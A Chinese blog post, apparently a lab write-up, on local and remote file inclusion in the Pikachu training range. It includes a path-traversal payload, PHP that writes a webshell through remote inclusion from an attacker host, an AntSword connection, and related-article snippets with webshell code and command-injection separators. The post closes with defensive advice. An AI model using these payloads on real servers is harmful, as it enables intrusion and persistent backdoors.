flie inclusion 文件包含

最新推荐文章于 2024-04-10 13:27:43 发布
最新推荐文章于 2024-04-10 13:27:43 发布
阅读量248 收藏
点赞数
分类专栏: web 文章标签: 渗透测试 安全漏洞 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_50688050/article/details/117069070
版权

目录

 

概述

php语言中的文件包含函数

分类

PIKACHU--Fiel inclusion(local)

分析源码

PIAKCHU--file inclusion(remote)

尝试直接包含木马

源码分析

总结

概述

在各种开发语言中都内置了文件包含函数,本意是有助于开发人员的效率以及代码的整洁,但有些时候包含的代码文件被写成变量且可以被前端用户传递进来的时候就产生了风险。

php语言中的文件包含函数

  • include()
    • 在发生错误时会生成警告(E_WARNING),继续执行
  • require()
    • 在发生错误时会报错(E_COMPLE_ERROR)并停止执行

分类

  • 本地文件执行
    • 威胁较小,主要是读取一些系统的敏感文件
  • 远程文件执行
    • 威胁巨大,攻击者可以传入任意代码

PIKACHU--Fiel inclusion(local)

首先有选项我们先挨个点一下看有没有什么反应

根据不同的选项弹出不同球星的简洁,好像也没有什么不一样,看url

看到url是有文件的,很可能存在文件包含漏洞。然后我又重新点了一遍观察到五个选项对应五个文件分别是file1.php-file5php

用目录跳转的方式进行测试,由于这是我们自己搭的平台所以就直接用windows下的系统文件进行测试(如果是不知道的话就先用windows试一下不行再用linux 的系统文件路径尝试嘛)

把文件名的位置替换为

../../../../Windows/System32/drivers/etc/hosts
######
这个文件路径并不固定,只要是windows下存在的系统文件路径即可,多个../的目的也是先跳转到根目录下

还有就是当我们看到有文件存在的时候可以稍微扩展一下思路,既然存在5个文件那么会不会存在更多的文件,既然这5个文件的格式都一样那么会不会别的文件的格式也跟这5个差不多会不会也是数字的延续。我们可以用burpsuit抓个包尝试去爆破一下。

写了一个6-30的字典加载进去

 

爆出一个file6.php里面有两个账号和密码,剩下的两个虽然没有爆出东西,但是通过报错我们已经直到文件的路径,

分析源码

PIAKCHU--file inclusion(remote)

首先更改一下配置

在phpstudy面板->其他菜单选项->PHP扩展及设置—>参数开关设置就可以找到这个选项啦

有了上一题的经验,我们点击选项的时候时刻注意url有什么变化,看到这边虽然也是文件但是多了一个include函数

尝试直接包含木马

服务器:192.168.179.138

攻击者:192.168.179.1

攻击机写一个木马文件放在phpstudy的www目录下,让服务器可以访问的到(我们还是用phpstudy环境比较方便)文件名为yijuhua.txt

<?php
fputs(fopen('shell.php','w'),'<?php assert($_POST[fin]);?>')

?>

把url中的文件名替换为木马的文件路径,并且页面没有什么异常

但是这个时候我们去查看/pikachu/vul/fileinclude/目录

这边是已经生成了以和名为shell.php的木马文件

用蚁剑连接

url是木马文件的具体位置,连接密码是一句话木马写入的

源码分析

跟上面一样还是直接传参没有任何过滤措施

总结

分享一个知识点,PHP文件不过文件后缀是什么,只要包含PHP代码就可以被当成PHP来执行。

通过两个实验我们可以大概了解到一些攻击思路,同时也会想到一些防范措施:比如说要尽量减少文件包含函数被前端操作,对一些特殊符号如 ../ ../等过滤,配置php.ini文件时allow_url_fopen、allow_url_include、magic_quotes_gpc涉及到这三个参数时要谨慎使用,尽量不要开放权限,最后就是设置一个白名单只允许包含运行指定的文件,其他的一律禁止

 

 

php双写绕过,任意文件包含漏洞的绕过方式
weixin_35796591的博客
03-10 1200
本文转自行云博客https://www.xy586.top/文章目录前期准备长目录截断原理payload%00截断原理payload基于session机制传马条件:payload总结前期准备file.php代码$a = $_GET['a'];include($a.'.html');?>hack.php代码fputs(fopen('shell.php','w'),'');?>长目录截断原...
java实现对txt文件读入,替换部分文字后写出到另一个文件
nkymxx123456的博客
06-14 1771
package com; import java.io.*; public class test { public static void Test(String oldfilePath,String newfilePath){ File file = new File(oldfilePath); //判断文件存在并且是文件 Boolean boo = file.exists()&&file.isFile(); System.out.println(boo);
RCE代码及命令执行漏洞
m0_51468027的博客
02-13 7248
  在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。 一、代码执行 1、脚本 (1)PHP   PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。   常见代码执行函数,如 eval()、assert()、preg_replace()、create_function
PHP - 执行外部程序(Linux命令/C语言程序) - 学习/实践
"代码"的日常搬运
10-21 5006
主要用于调用外部命令/程序处理任务需求。
PHP文件包含漏洞
时之海
02-11 654
0x00 文件包含文件包含漏洞 文件包含是指,服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行。文件包含还有另外一个名称,那就是代码重用。我们若是需要修改页面,只需要修改一个头部代码文件就可以了,其他上万个页面将会全部对应改变。 文件包含漏洞是指客户端(一般为浏览器)用户通过输入控制动念包含在版务器的文件,从而导致恶意代码的执行及敏感信息泄露,主要包括本地文件包含LFI和远程文件包含RFI两种形式 0x01 文件包含函数 文件包含的函数: vrequire()
代码执行漏洞笔记
weixin_45653478的博客
04-10 910
在 windows 系统下的 cmd 命令中,有以下一些截断拼接符。前面的语句为假则直接执行后面的;&&前面的语句为假则直接出错,后面的也不执行;直接执行后面的语句||前面出错执行后面的在 Linux 系统下的 shell 命令中,有以下一些截断拼接符。给大家强调一下,在 linux 下和在windows下的命令拼接符有一定的区别在 Linux 上,上面的;也可以用 | 、|| 代替;;前面的执行完执行后面的ifconfigifconfig| 是管道符,显示后面的执行结果。
你真的了解一句话木马吗?
热门推荐
Elite的博客
04-14 2万+
一句话木马是大多网安人在初步学习中,遇到的一种简单的木马文件,但是你真的了解它吗?
UEFI-dsc.dec.fdf文件
m0_49918601的博客
09-10 780
UEFI-dsc.dec.fdf文件   上一篇介绍了 .inf文件, .inf文件相当于Visual Studio中的工程文件。而 .dsc(Platform Description File)则相当于Visual Studio中的 solution 文件。每个包都要包含一个.dec(Package Declaration File)文件、一个 .dsc文件。如果这个包还用于固件Iamge或Option Rom Image的生成,则还需要添加 .fdf(Flash Description File)文件.
php文件包含绕过,文件包含漏洞(绕过姿势) | nmask's Blog
weixin_35094408的博客
03-18 846
谁将烟焚散,散了纵横的牵绊文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell....
xctf web之 command_execution
L1ni01
08-06 276
打开题目 源代码也没东西 题目为 命令执行 并且题目提示没 waf 肯定就用到命令执行漏洞 先介绍一下 命令执行漏洞: 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击。 常见连接符 ;A;B 先执行A,再执行B & A&B 简单拼接,A B之间无制约关系 | A|B 显示B的执行结果 &&amp
Pikachu靶场之RCE漏洞详解
m0_46467017的博客
05-18 8537
Pikachu靶场之RCE漏洞详解漏洞简述诚意推荐靶场闯关第1关 exec “ping”源码分析:第2关 exec "eval"源码分析 漏洞简述 一、什么是RCE? RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 1、远程系统命令执行 出现原因:因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。 比如常见的路由器、防火墙、入侵检测等设备的web管理界面上,一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地
sql 注入之 piakchu 靶场练习
Goodric的博客
02-14 467
sql注入 在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。 上篇博客对sql注入的一些知识进行了学习:SQL注入学习 下面通过 pikachu 靶场对 sql 注入的几种方式进行测试 数字型注入 打开页面,可以看到对输入的内容进行了限制。 尝试随便选择一个数字进行查询,由于是 post 请求,url 没有发生变化。 用 burp 抓包,可以看到请求的数据。 发到 Repeater 模块进行测试,可以在 Params 处修改参数 id
远程包含shell时,上传shell时所遇到一句话木马不能上传问题解决的办法(这里为单引号与双引号问题)
1stPeak's Blog
04-24 1848
远程包含shell 需要allow_url_open=On,才可以尝试远程包含一句话木马: http://www.xxx.com/echo.txt, 代码如下。 <?php fputs (fopen("shell.php","w"),'<?php eval($_POST[cmd]);?>') ?> 或者 <?php $b='<?php eval($_POST[...
PHP代码执行函数总结
11-15 916
&#13;   PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。&#13;   常见代码执行函数,如  &#13;     eval()、assert()、preg_replace()、create_function()&#13;     array_map()、call_user_func()、call_user_fun...
pikachu--xss
鲨鱼辣椒的博客
05-12 5152
XSS概述 XSS全称跨站脚本(Cross Site Scripting)是web中最为常见的漏洞之一,也是危害特别大的一种漏洞,一直高居漏洞排行榜的前几名。XSS漏洞的成因是没有对WEB前端的输入边界尽心严格的过滤,造成攻击者可以通过构造脚本语言使得输入的内容被当成正常的HTML来执行(类似于SQL注入),从而产生危害。xss漏洞危害的对象主要是前端用户,并且可以用来进行钓鱼、前端js挖矿、用户cookie获取、甚至可以结合浏览器自身的漏洞对主机进行远程控制等。 XSS(窃取cookie)攻击流程 .
利用beef盗取浏览器cookie,并实现页面跳转
鲨鱼辣椒的博客
05-19 2450
实验环境 KALI kali中需要安装beef工具 DVWA靶场 客户端 我是在本地搭的靶场,然后开两台虚拟机,一台kali当作攻击者,一台任何系统的主机 搭建靶场 首先搭建靶场,开启phpstudy让让别人可以访问就可以了(我这边的靶场是安装好的,如果没有安装的话可以先去下载) 下载安装步骤:先去phpstady官网下载一个最新版的phpstudy(这个最新版的不用配置环境直接安装就能用特别方便),然后找到DWVS的数据包下载下来(如果找不到的话我可以发给你),放到phpstudy的ww
一句话木马的使用
鲨鱼辣椒的博客
05-02 2387
实验准备 首先保存一个一句话木马文件Untitled-1.php <?php @eval($_POST['pass']);?> DVWA平台 中国蚁剑 实验步骤 首先进入DVWA平台,选择LOW安全级别 在low安全级别中,网站未对上传的文件进行任何验证所以可以直接上传PHP或ASP一句话木马(可通过右下角的view source查看后台源代码) 将木马文件上传,可以观察到回显的路径,并且查看网站资源可可以看到文件已经被成功上传了 使用中国蚁剑连接,右击添加数据 连接时的
PIKACHU--SQL注入
鲨鱼辣椒的博客
05-17 1849
SQL Inject(SQL)概述 注入漏洞在全球漏洞排行榜上一直高居榜首而注入漏洞中首当其冲的就是数据库注入漏洞,SQL注入漏洞主要的成因是子啊数据交互中,前端数据传入到后台处理时,没有做严格的过滤,导致传入后台的“数据”拼接到SQL语句中后,被当成SQL语句的一部分执行,从而产生与原本语句截然不同的意思,导致数据库受损(被脱裤、删除、甚至整个服务器权限沦陷) SQL注入流程 注入点探测 手动方式:手工构造SQL语句进行注入点发现 自动方式:采用自动扫描工具,自动进行注入点发现 信息获取 通过
pikachu-----暴力破解
鲨鱼辣椒的博客
05-10 1355
什么是暴力破解 “暴力破解”是一攻击具手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 理论上来说,大多数系统都是可以被暴力破解的,只要攻击者有足够强大的计算能力和时间,(但是一般来讲我们的电脑的性能一次测试的时间也都是有限的)所以断定一个系统是否存在暴力破解漏洞,其条件也不是绝对的。 我们说一个web应用系统存在暴力破解漏洞,一般是指该web
pikachu靶场文件上传file inclusion
最新发布
03-04
### 文件上传与文件包含漏洞利用及防御 在处理像Pikachu靶场中的文件上传和文件包含漏洞时,理解这些漏洞的工作原理及其潜在风险至关重要。当应用程序允许用户上传文件并随后尝试动态加载或解析这些文件作为代码的一部分时,就会发生此类漏洞。 #### 漏洞利用实例 假设存在一个PHP应用,其中有一个用于展示不同页面布局的功能,此功能接受来自用户的输入来决定要显示哪个模板文件: ```php <?php // 不安全的做法 $filename = $_GET['page']; include($filename . '.php'); ?> ``` 如果`$_GET['page']`未经过适当验证就被直接使用于`include()`语句中,则攻击者可以通过精心构造请求参数注入恶意路径或URL,进而触发本地或远程文件包含攻击[^1]。 对于文件上传结合文件包含的情况,通常涉及两个主要方面: - 用户提交带有特定扩展名(如`.php`)的文件到服务器; - 应用程序未能正确区分正常图片或其他类型的文件与可执行脚本之间的差异,并错误地将其视为合法资源进行处理。 例如,在某些情况下,即使上传的是图像文件,但如果其实际内容为PHP代码片段,一旦被不当包含,就能被执行。 #### 安全防护建议 为了防止上述提到的安全隐患,应当采取以下措施加强保护机制: - **严格校验文件类型**:不仅依赖MIME类型判断,还应基于文件头信息进一步确认文件的真实性质。 - **限定存储位置**:确保所有上传的数据都被保存在一个独立且受控的位置之外,远离Web根目录,避免意外访问。 - **禁用危险设置**:修改`php.ini`配置项,关闭不必要的选项,比如`allow_url_fopen=Off` 和 `allow_url_include=Off` ,阻止从外部源获取数据的可能性[^2]。 - **实施白名单策略**:只允许预定义列表内的文件名称或模式参与动态加载过程;拒绝一切不在范围之内的请求。 - **启用魔术引号GPC (Magic Quotes GPC)** :虽然现代版本已弃用了这一特性,但在较旧环境中开启它可以自动转义特殊字符,减少SQL注入和其他形式的字符串插值攻击的风险。 综上所述,针对Pikachu靶场所模拟的实际应用场景,开发者应该始终遵循最小权限原则设计API接口逻辑,同时配合有效的输入输出净化手段以及合理的架构规划共同构建起坚固防线抵御各类网络威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值